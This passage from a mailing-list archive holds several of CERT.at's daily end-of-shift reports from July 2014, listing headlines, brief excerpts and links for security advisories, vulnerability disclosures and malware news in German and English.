providing news stories, alerts and live video, it also includes iReport functionality, allowing... --------------------------------------------- http://research.zscaler.com/2014/07/cnn-app-for-iphone.html *** OWASP Zed Attack Proxy, (Mon, Jul 21st) *** --------------------------------------------- Affectionately know as ZAP the OWASP Zed Attack Proxy in an excellent web application testing tool. It finds its way into the hands of experienced penetration testers, newer security administrators, vulnerability assessors, as well as auditors and the curious. One of the reasons for its popularity is the ease of use and the extensive granular capability to examine transactions. While some may know ZAP as a fork or successor to the old Paros proxy,it is so much more. Roughly 20% of the code base... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18421&rss *** Old and Persistent Malware *** --------------------------------------------- User error is the best reason to explain why Excel spreadsheets infected with the Laroux macro virus have been published on the China Securities Regulatory Commission website (csrc.gov.cn). The commission regulates China's financial markets and provides an online law library on their website where visitors can download various files and texts. Two of the files available in the library contain the MSEXcel.Laroux virus. --------------------------------------------- https://blogs.cisco.com/security/old-and-persistent-malware/ *** FakeNet Malware Analysis *** --------------------------------------------- FakeNet is a tool that aids in the dynamic analysis of malicious software. The tool simulates a network so that malware interacting with a remote host continues to run allowing the analyst to observe the malware's network activity from within a safe environment. --------------------------------------------- http://www.ehacking.net/2014/07/fakenet-malware-analysis.html *** Cisco-Routerlücke: Der mysteriöse Vorab-Patch *** --------------------------------------------- Die kritische Sicherheitslücke, die neun Router und Kabelmodems von Cisco verwundbar für Angriffe aus dem Netz macht, ist bei deutschen Providern vor Jahren mit einem Update geschlossen worden. Allerdings bleibt unklar, warum Cisco den Fix erst jetzt öffentlich machte. --------------------------------------------- http://www.heise.de/security/meldung/Cisco-Routerluecke-Der-mysterioese-Vor… *** App "telemetry", (Tue, Jul 22nd) *** --------------------------------------------- ISC reader James had just installed "Foxit Reader" on his iPhone, and had answered "NO" to the "In order to help us improve Foxit Mobile PDF, we would like to collect anonymous usage data..." question, when he noticed his phone talking to China anyway. The connected-to site was alog.umeng.com, 211.151.151.7. Umeng is an "application telemetry" and online advertising company. Below is what was sent (some of the ids are masked or have been obfuscated) I --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18425&rss *** Massive Malware Infection Breaking WordPress Sites *** --------------------------------------------- The last few days has brought about a massive influx of broken WordPress websites. What makes it so unique is that the malicious payload is being blindly injected which is causing websites to break. While we're still researching, we do want to share share some observations: This infection is aimed at websites built on the... --------------------------------------------- http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.h… *** Privacy Badger Extension Blocks Tracking Through Social Icons *** --------------------------------------------- Online tracking has been a thorny problem for years, and as Web security companies, browser vendors and users have become more aware of the problem and smarter about how to defend themselves, ad companies and trackers have responded in kind. The advent of social networks has made it far easier for tracking companies to monitor user behavior across... --------------------------------------------- http://threatpost.com/privacy-badger-extension-blocks-tracking-through-soci… *** [webapps] - MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities *** --------------------------------------------- http://www.exploit-db.com/exploits/34128 *** Apache Multiple Flaws Let Remote Users Deny Service or Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030615 *** Tenable Nessus Access Control Flaw in Web UI Lets Remote Users Obtain Potentially Sensitive Information *** --------------------------------------------- http://www.securitytracker.com/id/1030614 *** Apache Scoreboard / Status Race Condition *** --------------------------------------------- Topic: Apache Scoreboard / Status Race Condition Risk: Medium Text:Hi there, --[ 0. Sparse summary Race condition between updating ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070114 *** HPSBMU03071 rev.1 - HP Autonomy IDOL, Running OpenSSL, Remote Unauthorized Access, Disclosure of Information *** --------------------------------------------- A potential security vulnerability has been identified with HP Autonomy IDOL. The vulnerability could be exploited to allow remote unauthorized access and disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Moodle rubric/advanced grading cross-site scripting *** --------------------------------------------- Moodle rubric/advanced grading cross-site scripting --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94724 *** OleumTech WIO Family Vulnerabilities *** --------------------------------------------- Security researchers Lucas Apa and Carlos Mario Penagos Hollman of IOActive have identified multiple vulnerabilities in OleumTech's WIO family including the sensors and the DH2 data collector. The researchers have coordinated the vulnerability details with NCCIC/ICS-CERT and OleumTech in hopes the vendor would develop security patches to resolve these vulnerabilities. While ICS-CERT has had many discussions with both OleumTech and IOActive this past year, there has not been consensus... --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-202-01 *** Bugtraq: Web Login Bruteforce in Symantec Endpoint Protection Manager 12.1.4023.4080 *** --------------------------------------------- http://www.securityfocus.com/archive/1/532857

1 0

Tageszusammenfassung - Montag 21-07-2014
by Daily end-of-shift report 21 Jul '14

21 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 18-07-2014 18:00 − Montag 21-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** The Little Signature That Could: The Curious Case of CZ Solution *** --------------------------------------------- Malware authors are always looking for new ways to masquerade their actions. Attackers are looking for their malware to be not only fully undetectable, but also appear valid on a system, so as not to draw attention. Digital signatures are... --------------------------------------------- http://www.fireeye.com/blog/technical/2014/07/the-little-signature-that-cou… *** Keeping the RATs out: the trap is sprung - Part 3, (Sat, Jul 19th) *** --------------------------------------------- As we bring out three part series on RAT tools suffered upon our friends at Hazrat Supply we must visit the centerpiece of it all. The big dog in this fight is indeed the bybtt.cc3 file (Jake suspected this), Backdoor:Win32/Zegost.B. The file is unquestionably a PEDLL but renamed a .cc3 to hide on system like a CueCards Professional database file. Based on the TrendMicro writeup on this family, the backdoor drops four files, including %Program Files%\%SESSIONNAME%\{random characters}.cc3 This... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18415&rss *** Top 10 Common Database Security Issues *** --------------------------------------------- Introduction The database typically contains the crown jewels of any environment; it usually holds the most business sensitive information which is why it is a high priority target for any attacker. The purpose of this post is to create awareness among database administrators and security managers about some of the areas on which it is important to focus on when implementing a new database or hardening the security of an existing one. --------------------------------------------- https://www.nccgroup.com/en/blog/2014/07/top-10-common-database-security-is… *** Smart Meter Attack Scenarios *** --------------------------------------------- In our previous post, we looked at how smart meters were being introduced across multiple countries and regions, and why these devices pose security risks to their users. At their heart, a smart meter is simply... a computer. Let's look at our existing computers - whether they are PCs, smartphones, tablets, or embedded devices. Similarly, these... --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/smart-meter-atta… *** Angriffe auf Web-Server via Wordpress-Plugin MailPoet *** --------------------------------------------- Über eine kürzlich entdeckte Sicherheitslücke werden derzeit systematisch Server gekapert. Wer das Anfang Juli veröffentlichte Update noch nicht installiert hat, sollte das dringend nachholen. --------------------------------------------- http://www.heise.de/security/meldung/Angriffe-auf-Web-Server-via-Wordpress-… *** Home router security to be tested in upcoming hacking contest *** --------------------------------------------- Researchers are gearing up to hack an array of different home routers during a contest next month at the Defcon 22 security conference. The contest is called SOHOpelessly Broken - a nod to the small office/home office space targeted by the products - and follows a growing number of large scale attacks this year against routers and other home embedded systems. --------------------------------------------- http://www.cio.com/article/2455981/home-router-security-to-be-tested-in-upc… *** Sicherheitsforscher weist auf "Hintertüren" in iOS hin *** --------------------------------------------- Undokumentierte Systemdienste in iOS machen Angreifern das Auslesen von Nutzerdaten leicht, wenn das iPhone oder iPad mit einem Desktop-Computer lokal gepairt wurde, erklärt Jonathan Zdziarski - und hofft auf Antwort von Apple. --------------------------------------------- http://www.heise.de/security/meldung/Sicherheitsforscher-weist-auf-Hintertu… *** Call for last-minute papers for VB2014 announced *** --------------------------------------------- Seven speaking slots waiting to be filled with presentations on hot security topics. --------------------------------------------- http://www.virusbtn.com/news/2014/07_21.xml?rss *** Heartbleed bedroht kritische Industrie-Kontrollsysteme *** --------------------------------------------- Über drei Monate nach Bekanntwerden der massiven Sicherheitslücke sind immer noch zahlreiche Systeme von Siemens ungeschützt. --------------------------------------------- http://futurezone.at/digital-life/heartbleed-bedroht-kritische-industrie-ko… *** VMSA-2014-0006.8 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0006.html *** EMC RecoverPoint Internal Firewall Ruleset Error Lets Remote Users Bypass the Firewall *** --------------------------------------------- http://www.securitytracker.com/id/1030608 *** DSA-2981 polarssl *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2981 *** DSA-2982 ruby-activerecord-3.2 *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2982 *** IBM Security Bulletins *** --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** VU#688812: Huawei E355 contains a stored cross-site scripting vulnerability *** --------------------------------------------- Vulnerability Note VU#688812 Huawei E355 contains a stored cross-site scripting vulnerability Original Release date: 21 Jul 2014 | Last revised: 21 Jul 2014 Overview The Huawei E355 built-in web interface contains a stored cross-site scripting vulnerability. Description Huawei E355 wireless broadband modems include a web interface for administration and additional services. The web interface allows users to receive SMS messages using the connected cellular network.CWE-79: Improper... --------------------------------------------- http://www.kb.cert.org/vuls/id/688812 *** Bugtraq: CVE-2014-4326 Remote command execution in Logstash zabbix and nagios_nsca outputs. *** --------------------------------------------- Vendor: Elasticsearch Product: Logstash CVE: CVE-2014-4326 Affected versions: Logstash 1.0.14 through 1.4.1 --------------------------------------------- http://www.securityfocus.com/archive/1/532841

1 0

Tageszusammenfassung - Freitag 18-07-2014
by Daily end-of-shift report 18 Jul '14

18 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 17-07-2014 18:00 − Freitag 18-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** SQL Injection Vulnerability - vBulletin 5.x *** --------------------------------------------- The vBulletin team just released a security patch for vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1, and 5.1.2 to address a SQL injection vulnerability on the member list page. Every vBulletin user needs to upgrade to the latest version asap. vBulletin is a very popular forum sofware used on more than .. --------------------------------------------- http://blog.sucuri.net/2014/07/sql-injection-on-vbulletin-5-x.html *** Siemens OpenSSL Vulnerabilities *** --------------------------------------------- Siemens has identified four vulnerabilities in its OpenSSL cryptographic software library affecting several Siemens industrial products. Updates are available for APE 2.0.2 and WinCC OA (PVSS). The ROX 1, ROX 2, S7-1500, and CP1543-1 products do not have a patch at this time; however, Siemens has made mitigation recommendations. Siemens is continuing to work on patching these vulnerabilities. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-198-03 *** Cogent DataHub Code Injection Vulnerability *** --------------------------------------------- NCCIC/ICS-CERT has become aware of a code injection vulnerability affecting the Cogent DataHub application produced by Cogent Real-Time Systems, Inc. (hereafter referred to as Cogent). Security researcher John Leitch reported this vulnerability to the Zero Day Initiative (ZDI), who then reported it directly to Cogent. Successful exploitation of this vulnerability could allow remote execution of arbitrary code. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-198-01 *** Advantech WebAccess Vulnerabilities *** --------------------------------------------- NCCIC/ICS-CERT received a report from the Zero Day Initiative (ZDI) concerning vulnerabilities affecting the Advantech WebAccess application. These vulnerabilities were reported to ZDI by security researchers Dave Weinstein, Tom Gallagher, John Leitch, and others. Advantech has produced an updated software version that mitigates these vulnerabilities. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-198-02 *** Mitigating UAF Exploits with Delay Free for Internet Explorer *** --------------------------------------------- After introducing the 'isolated heap' in June security patch for Internet Explorer, Microsoft has once again introduced several improvements in the July patch for Internet Explorer. The most interesting and smart improvement is one which we will call 'delay free.' This improvement is designed to mitigate Use After Free (UAF) vulnerability exploits .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-uaf-e… *** DSA-2979 fail2ban *** --------------------------------------------- Two vulnerabilities were discovered in Fail2ban, a solution to ban hosts that cause multiple authentication errors. When using Fail2ban to monitor Postfix or Cyrus IMAP logs, improper input validation in log parsing could enable a remote attacker to trigger an IP ban on arbitrary addresses, resulting in denial of service. --------------------------------------------- http://www.debian.org/security/2014/dsa-2979 *** Bugtraq: Microsoft MSN HBE - Blind SQL Injection Vulnerability *** --------------------------------------------- A boolean-based blind SQL Injection web vulnerability has been detected in the official MSN (habitos.be.msn.com) web application Service. The vulnerability allows remote attackers to inject own sql commands to compromise the affected .. --------------------------------------------- http://www.securityfocus.com/archive/1/532830 *** Critroni Crypto Ransomware Seen Using Tor for Command and Control *** --------------------------------------------- There's a new kid on the crypto ransomware block, known as Critroni, that's been sold in underground forums for the last month or so and is now being dropped by the Angler exploit kit. The ransomware includes a number of unusual features and researchers say .. --------------------------------------------- http://threatpost.com/critroni-crypto-ransomware-seen-using-tor-for-command… *** LibreSSL: Linuxer und OpenBSDler raufen sich zusammen *** --------------------------------------------- Anhand der Probleme bei der Portierung von LibreSSL auf andere Plattformen wie Linux kann man erkennen, wie aus OpenSSL so ein Security-Alptraum werden konnte. Und der ist noch längst nicht vorbei. --------------------------------------------- http://www.heise.de/security/meldung/LibreSSL-Linuxer-und-OpenBSDler-raufen…

1 0

Tageszusammenfassung - Donnerstag 17-07-2014
by Daily end-of-shift report 17 Jul '14

17 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 16-07-2014 18:00 − Donnerstag 17-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Kritische Sicherheitslücke gefährdet Router und Modems von Cisco *** --------------------------------------------- Neun Consumer-Router und Kabelmodems von Cisco sind anfällig für eine kritische Lücke, die es Angreifern aus dem Netz ermöglicht, das Gerät zu kapern. Auch deutsche Provider setzten die betroffenen Modelle ein. --------------------------------------------- http://www.heise.de/security/meldung/Kritische-Sicherheitsluecke-gefaehrdet… *** Cisco Wireless Residential Gateway Remote Code Execution Vulnerability *** --------------------------------------------- A vulnerability in the web server used in multiple Cisco Wireless Residential Gateway products could allow an unauthenticated, remote attacker to exploit a buffer overflow and cause arbitrary code execution. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ciscos… *** Cisco Cable Modem Buffer Overflow Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- A remote user can send a specially crafted HTTP request to the target device to trigger a buffer overflow and execute arbitrary code on the target system. --------------------------------------------- http://www.securitytracker.com/id/1030598 *** Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability *** --------------------------------------------- The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-14-236/ *** Zusatzinformationen zum Interview im Standard *** --------------------------------------------- Zusatzinformationen zum Interview im Standard16. Juli 2014Wir freuen uns (fast) immer, wenn wir in Medien zitiert werden, und wir damit eine deutlich breitere Masse erreichen, als nur über unsere direkten Kanäle (Webseite, RSS, Mail, Twitter).Nur: Interviews müssen meist recht schnell gehen, Journalisten arbeiten täglich mit harten Deadlines und auf Papier gibt es beschränkten Platz und keine Hyperlinks.Daher will ich hier ein bisschen Kontext zum Interview geben, das .. --------------------------------------------- http://www.cert.at/services/blog/20140716101643-1199.html *** SA-CORE-2014-003 - Drupal core - Multiple vulnerabilities *** --------------------------------------------- Multiple vulnerabilities were fixed in the supported Drupal core versions 6 and 7. (Denial of Service, Cross Site Scripting, Access Bypass) --------------------------------------------- https://www.drupal.org/SA-CORE-2014-003 *** SA-CONTRIB-2014-071 - FileField - Access bypass *** --------------------------------------------- A vulnerability was discovered in the FileField third-party module that could allow attackers to gain access to private files. --------------------------------------------- https://www.drupal.org/node/2304561 *** Kaum eingeführt, schon umgestellt: Apple verbessert iCloud-Mail-Verschlüsselung *** --------------------------------------------- Nur wenige Tage nach der Einführung einer Transportverschlüsselung für Apples iCloud-Mail-Dienste bessert der Konzern nach. Zumindest einige Server genügen jetzt aktuellen Anforderungen an gute Verschlüsselung. --------------------------------------------- http://www.heise.de/security/meldung/Kaum-eingefuehrt-schon-umgestellt-Appl… *** Pushdo Trojan outbreak: 11 THOUSAND systems infected in just 24 hours *** --------------------------------------------- A wave of attacks by cybercrooks pushing a new variant of the resilient Pushdo Trojan has compromised more than 11,000 systems in just 24 hours. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/17/pushdo_troj… *** Paper: Mayhem - a hidden threat for *nix web servers *** --------------------------------------------- New kind of malware has the functions of a traditional Windows bot, but can act under restricted privileges in the system. --------------------------------------------- http://www.virusbtn.com/news/2014/07_17.xml *** Havex, It's Down With OPC *** --------------------------------------------- FireEye recently analyzed the capabilities of a variant of Havex (referred to by FireEye as 'Fertger' or 'PEACEPIPE'), the first publicized malware reported to actively scan OPC servers used for controlling SCADA (Supervisory Control and Data Acquisition) devices in .. --------------------------------------------- http://www.fireeye.com/blog/technical/targeted-attack/2014/07/havex-its-dow…

1 0

Tageszusammenfassung - Mittwoch 16-07-2014
by Daily end-of-shift report 16 Jul '14

16 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 15-07-2014 18:00 − Mittwoch 16-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** SSL Black List Aims to Publicize Certificates Associated With Malware *** --------------------------------------------- Malware and botnet operators are always adapting their tactics, trying to stay a step or two ahead of defensive technologies and techniques. One of the methods many attackers have adopted is using SSL to communicate with the infected machines they control, and a researcher has started a new .. --------------------------------------------- http://threatpost.com/ssl-black-list-aims-to-publicize-certificates-associa… *** Early Review of LibreSSL Finds Problematic PRNG *** --------------------------------------------- A critical vulnerability was reported in the random number generator in LibreSSL, a fork of OpenSSL. LibreSSL preview versions were released this weekend. --------------------------------------------- http://threatpost.com/early-review-of-libressl-finds-problematic-prng/107239 *** Critical Patch Update - July 2014 *** --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html *** About Two Recently Patched IBM DB2 LUW Vulnerabilities *** --------------------------------------------- IBM recently released patches for three security vulnerabilities affecting various versions of DB2 for Linux, Unix and Windows. This post will explore some more technical details of two of these vulnerabilities (CVE-2014-0907 and CVE-2013-6744) to help database administrators assess the risk of .. --------------------------------------------- http://blog.spiderlabs.com/2014/07/about-two-ibm-db2-luw-vulnerabilities-pa… *** Citrix XenServer Multiple Security Updates *** --------------------------------------------- A number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix .. --------------------------------------------- http://support.citrix.com/article/CTX140984 *** Elipse E3 Scada PLC Denial Of Service *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070083 *** [2014-07-16] Multiple SSRF vulnerabilities in Alfresco Community Edition *** --------------------------------------------- The Alfresco Community Edition Server is prone to multiple Server Side Request Forgery vulnerabilities allowing access to internal resources for an unauthenticated attacker. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** HP Data Protector, Remote Execution of Arbitrary Code *** --------------------------------------------- A potential security vulnerability has been identified with HP Data Protector. This vulnerability could be remotely exploited to execute arbitrary code. --------------------------------------------- http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** [2014-07-16] Remote Code Execution via CSRF in OpenVPN Access Server "Desktop Client" *** --------------------------------------------- Remote attackers can execute arbitrary code and execute other attacks on computers with the OpenVPN Access Server "Desktop Client" installed. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** [2014-07-16] Multiple critical vulnerabilities in Bitdefender GravityZone *** --------------------------------------------- Attackers are able to completely compromise the Bitdefender GravityZone solution as they can gain system and database level access. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Schwachstelle in Symfony: W0rm hackt Cnet *** --------------------------------------------- Die russische Hackergruppe W0rm hat sich Zugang zu den Servern der Nachrichtenwebseite Cnet verschafft. Die Datenbank mit Benutzerdaten wollen die Hacker für einen symbolische Betrag von einem Bitcoin verkaufen. --------------------------------------------- http://www.golem.de/news/schwachstelle-in-symfony-w0rm-hackt-cnet-1407-1079… *** Common Misconceptions IT Admins Have on Targeted Attacks *** --------------------------------------------- In our efforts around addressing targeted attacks, we often work with IT administrators from different companies in dealing with threats against their network. During these collaborations, we've recognized certain misconceptions that IT administrators - or perhaps enterprises in general - have in terms of targeted attacks. I will cover some of them in this .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/common-misconcep…

1 0

Tageszusammenfassung - Dienstag 15-07-2014
by Daily end-of-shift report 15 Jul '14

15 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 14-07-2014 18:00 − Dienstag 15-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Introduction to Smart Meters *** --------------------------------------------- While wearable personal technology may be the most 'public' face of the Internet of Everything, the most widespread use of it may be in smart meters. What is a smart meter, exactly? It's a meter for utilities (electricity, gas, or water) that records the consumption of the utility in question, and transmits it .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/introduction-to-… *** Disclosure: Insecure Nonce Generation in WPtouch *** --------------------------------------------- If you use the popular WPtouch plugin (5m+ downloads) on your WordPress website, you should update it immediately. During a routine audit for our WAF, we discovered a very dangerous vulnerability that could potentially allow a user with no administrative privileges, who was logged in .. --------------------------------------------- http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wpto… *** Five Year Old Phishing Campaign Unveiled *** --------------------------------------------- Details have been disclosed on a five-year-old phishing campaign where in attackers have pilfered victims's login credentials from Google, Yahoo, Facebook, Dropbox and Skype. --------------------------------------------- http://threatpost.com/five-year-old-phishing-campaign-unveiled/107197 *** OpenVPN PrivateTunnel ptservice privilege escalation *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94482 *** HP StoreVirtual Bugs Let Remote Users Obtain Information and Remote Authenticated Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1030567 *** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates *** --------------------------------------------- A number of security vulnerabilities have been identified in the Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway, formerly known .. --------------------------------------------- http://support.citrix.com/article/CTX140863 *** iCloud-Mail-Versand jetzt auch verschlüsselt *** --------------------------------------------- Als einer der letzten grossen Mail-Provider hat Apple nun die Sicherung des Transports gegen einfaches Mitlesen eingeschaltet. Die eingesetzten Verfahren lassen allerdings viel zu wünschen übrig. --------------------------------------------- http://www.heise.de/security/meldung/iCloud-Mail-Versand-jetzt-auch-verschl… *** OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070078 *** Oracle zur Zukunft von Java 7 unter Windows XP *** --------------------------------------------- Java 7 wird bis frühestens April 2015 mit Security-Updates versorgt. Alle weiteren Releases der vorletzten Java-Version bis dahin werden auch weiterhin mit dem nicht mehr von Microsoft offiziell unterstützten Windows XP funktionieren. --------------------------------------------- http://www.heise.de/security/meldung/Oracle-zur-Zukunft-von-Java-7-unter-Wi… *** The 'Forbidden' Apple: App Stores and the Illusion of Control Part I *** --------------------------------------------- There is no doubt we truly live in an 'App Economy.' From personal to professional, we direct and live our lives through our smart phones. But while we enjoy the latest games, stream the latest content or catch up on our friends activities, few think .. --------------------------------------------- http://research.zscaler.com/2014/07/the-forbidden-apple-app-stores-and.html *** And the mice will 'Play': App Stores and the Illusion of Control Part II *** --------------------------------------------- In the last blog, we began analyzing what we've termed the vApp Dichotomy' of the App Economy - The fact that we are at least as much the consumed, as we are the consumer. Our goal was to analyze popular apps from Apple's App Store and Google Play to .. --------------------------------------------- http://research.zscaler.com/2014/07/and-mice-will-play-app-stores-and.html *** Project Zero: Google baut Internet-Sicherheitsteam auf *** --------------------------------------------- Mit Vollzeit-Entwicklern im Project Zero will Google, das Sicherheitsforschung bisher nur nebenbei betrieben hat, das Internet sicherer machen und politisch Verfolgten helfen. --------------------------------------------- http://www.golem.de/news/project-zero-google-baut-internet-sicherheitsteam-… *** New Kronos Banking Malware Advertised On Russian Forums *** --------------------------------------------- Researchers have spotted a new banking Trojan advertised for sale on Russian forums. Kronos promises features that help it evade detection and analysis, such as a Ring3 rootkit. --------------------------------------------- http://threatpost.com/new-kronos-banking-malware-advertised-on-russian-foru…

1 0

Tageszusammenfassung - Montag 14-07-2014
by Daily end-of-shift report 14 Jul '14

14 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 11-07-2014 18:00 − Montag 14-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Oracle to release 115 security patches *** --------------------------------------------- Oracle is planning to release 115 security patches for vulnerabilities affecting a wide array of its products, including its flagship database, Java SE, Fusion Middleware and business applications. The update includes fixes for 20 weaknesses in Java SE, all of which can be exploited by an attacker remotely, without the need for login credentials, .. --------------------------------------------- http://www.cio.com/article/2453362/oracle-to-release-115-security-patches.h… *** VU#917348: Datum Systems satellite modem devices contain multiple vulnerabilities *** --------------------------------------------- The Datum Systems SnIP operating system on PSM-4500 and PSM-500 satellite modem devices has FTP enabled by default with no credentials required, which allows open access to sensitive areas of the file system. A remote unauthenticated attacker may be able to gain full control of the device. --------------------------------------------- http://www.kb.cert.org/vuls/id/917348 *** Cisco ASA CIFS Share Enumeration Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the WebVPN Common Internet File System (CIFS) access function of Cisco Adaptive Security Appliance (ASA) could allow an authenticated, remote attacker to trigger a reload of the affected device. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013… *** Juniper Junos Unspecified Command Line Interface Flaw Lets Local Users Gain Root Privileges *** --------------------------------------------- A local user on the command line interface can invoke certain combinations of commands to gain root privileges on the target system. --------------------------------------------- http://www.securitytracker.com/id/1030559 *** Dell Sonicwall Scrutinizer 11.01 Code Execution / SQL Injection *** --------------------------------------------- Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with remote code execution. An attacker needs to be authenticated, but not as an administrator. However, that wouldn not stop anyone since there is also a privilege escalation vulnerability in that .. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070065 *** Schrack MICROCONTROL XSS / Disclosure / Weak Default Password *** --------------------------------------------- The Microcontrol emergency light system, distributed by Schrack Technik GmbH, is an autarchic emergency light system, which is configurable over a web interface. Through the vulnerabilities described in this advisory an attacker can reconfigure the whole emergency light system without authentication. Furthermore he can perform attacks.. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070067 *** 'Gameover' malware returns from the dead *** --------------------------------------------- In early June 2014, a internationally co-ordinated law enforcement effort against the criminals behind the infamous Gameover malware pretty much wiped out their botnet altogether. Bad news - it looks as though Gameover is back... --------------------------------------------- http://nakedsecurity.sophos.com/2014/07/13/gameover-malware-returns-from-th… *** Popular password protection programs p0wnable *** --------------------------------------------- LastPass, RoboForm, My1Login, PasswordBox and NeedMyPassword all flawed Researchers have detailed a series of quickly patched vulnerabilities in five popular password managers that could allow attackers to steal user credentials. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/14/popular_web… *** Beware Keyloggers at Hotel Business Centers *** --------------------------------------------- The U.S. Secret Service is advising the hospitality industry to inspect computers made available to guests in hotel business centers, warning that crooks have been compromising hotel business center PCs with keystroke-logging malware in a bid to steal personal and financial data from guests. --------------------------------------------- http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-cent… *** The Internet of Things: How do you "on-board" devices?, (Mon, Jul 14th) *** --------------------------------------------- Certified pre-pw0ned devices are nothing new. We talked years ago about USB picture frames that came with malware pre-installed. But for the most part, the malware was added to the device accidentally, or for example by customers who later returned the device just to have it resold without adequately resetting/wiping the device. But more recently, more evidence emerged that .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18387&rss *** Verschlüsselung: LibreSSL wird flügge *** --------------------------------------------- Die Entwickler des OpenSSL-Forks LibreSSL haben die erste Version ihrer Software veröffentlicht, die andere Plattformen als OpenBSD unterstützt. Damit schickt sich die SSL-Bibliothek an, eine echte Alternative zum Heartbleed-geplagten OpenSSL zu werden. --------------------------------------------- http://www.heise.de/security/meldung/Verschluesselung-LibreSSL-wird-fluegge… *** Understanding Ransomware *** --------------------------------------------- Our Cyber Defence Operations team, led by David Cannings, has published a new whitepaper on understanding ransomware. It looks at the impact, evolution and defensive strategies that can be employed by organisations. While the paper is primarily focused on Microsoft Windows due to the historic .. --------------------------------------------- https://www.nccgroup.com/en/blog/2014/07/understanding-ransomware/ *** VU#204988: Kaseyas agent driver contains NULL pointer dereference *** --------------------------------------------- Kaseyas agent driver, kapfa.sys, is vulnerable to a NULL pointer dereference. A local authenticated attacker may be able to crash the application, thereby causing a denial of service. Kaseya has .. --------------------------------------------- http://www.kb.cert.org/vuls/id/204988 *** WordPress Download Manager 2.6.8 Shell Upload *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070062 *** Shopizer 1.1.5 Code Execution / XSS / CSRF / Data Manipulation *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070066

1 0

Tageszusammenfassung - Freitag 11-07-2014
by Daily end-of-shift report 11 Jul '14

11 Jul '14

